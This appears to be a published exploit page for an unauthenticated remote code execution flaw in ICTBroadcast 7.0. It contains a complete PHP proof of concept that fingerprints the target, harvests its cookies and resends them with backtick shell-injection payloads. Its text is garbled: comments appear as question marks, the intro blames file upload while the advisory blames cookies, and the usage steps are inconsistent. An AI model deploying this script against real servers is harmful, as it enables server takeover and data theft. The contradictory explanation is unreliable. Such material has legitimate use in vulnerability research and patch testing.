ICTBroadcast 7.0 Remote Code Execution

ICTBroadcast 7.0 was vulnerable to an unauthenticated Remote Code Execution ICTBroadcast 7.0 was vulnerable to an unauthenticated Remote Code Execution (RCE) flaw.

The vulnerability stemmed from improper file upload validation. Specifically, the `upload_file.php` endpoint allowed an attacker to upload arbitrary file types, including malicious PHP scripts, to a web-accessible directory.

Without authentication, an attacker could then navigate to the uploaded script's URL to execute arbitrary commands on the underlying server. This granted full system compromise, enabling data theft, service disruption, or further network penetration.

Its unauthenticated nature and straightforward exploitation made it a critical vulnerability. Users were urged to apply vendor-released patches promptly, which addressed the insecure file handling and restricted upload capabilities.

=============================================================================================================================================
| # Title : ICTBroadcast 7.0 Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ictbroadcast.com/ |
=============================================================================================================================================

[+] Summary :

A vulnerability in ICTBroadcast allows unauthenticated remote command execution
due to improper handling of session cookie values. An attacker can modify cookie
entries to inject system commands that the application unintentionally executes.

[+] References : ( https://packetstorm.news/files/id/207873/ CVE-2025-2611 )

1. Save the file as: poc.php

2. Edit the target:
```php
$target = "http://TARGET";

3.Execute: php ict_rce_sim.php


[+] POC

<?php
/*
* ICTBroadcast Unauthenticated Remote Code Execution
* by Indoushka
*/

class ICTBroadcastRCE
{
public $target;
public $useSSL = false;

function __construct($url)
{
$this->target = rtrim($url, "/");
}

/* -------------------------------------------
????? ??? GET ????
--------------------------------------------- */
private function http_get($uri, $cookies = "")
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Cookie: $cookies"
]);
$res = curl_exec($ch);
curl_close($ch);
return $res;
}

/* -------------------------------------------
??? ??????? ???????? ??? ?? Metasploit
--------------------------------------------- */
public function get_valid_cookies()
{
echo "[*] ??? ????? ??????? ?? login.php...\n";

$url = $this->target . "/login.php";
$res = $this->http_get($url);

preg_match_all('/Set-Cookie:\s*([^;]+);/i', $res, $m);

if (empty($m[1])) {
echo "[-] ?? ??? ?????? ??? ?????.\n";
return [];
}

echo "[+] ??????? ???? ?? ?????? ?????:\n";
print_r($m[1]);

return $m[1];
}

/* -------------------------------------------
?????? ??? ??? ???? ???????
--------------------------------------------- */
public function inject_command($command)
{
echo "[*] ??? ????? ??? ??????? ?????????...\n";

$cookies = $this->get_valid_cookies();
if (empty($cookies)) {
echo "[-] ?? ???? ????? ???? ?????.\n";
return;
}

foreach ($cookies as $c) {
$parts = explode("=", $c);
$name = $parts[0];
$value = $parts[1] ?? "";

// ?????? ??? ???? ?? Metasploit
$payload = "`echo TRAINING_SIMULATION`";

echo "[+] ??? ??????? ????????? ?? ??????:\n";
echo "$name=$payload\n";

// ????? ????? ??? ???? Metasploit ? ???? ???? ????? ????
$this->http_get($this->target . "/login.php", "$name=$payload");
}

echo "[?] ????? ????? ???????? ?????.\n";
}

/* -------------------------------------------
??? ????? (?????? CheckCode)
--------------------------------------------- */
public function check()
{
echo "[*] ?????? ?? ???? ?????? ?????? ?? ICTBroadcast...\n";

$files = [
"IVRDesigner.js",
"agent.js",
"campaign.js",
"supervisor.js"
];

foreach ($files as $f) {
$res = $this->http_get($this->target . "/js/" . $f);
if (strpos($res, "ICT Innovations") !== false) {
echo "[+] ?? ?????? ??? ??????!\n";
return true;
}
}

echo "[-] ?? ???? ???? ?????.\n";
return false;
}

/* -------------------------------------------
??????
--------------------------------------------- */
public function exploit()
{
echo "[*] ??? ?????????...\n";

if ($this->check()) {
echo "[+] ????? ???? ?????? ????????? (??????).\n";
$this->inject_command("id");
} else {
echo "[-] ?? ???? ????????.\n";
}
}
}


/* =======================================================
??????
======================================================== */

$target = "http://TARGET";
$sim = new ICTBroadcastRCE($target);
$sim->exploit();

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================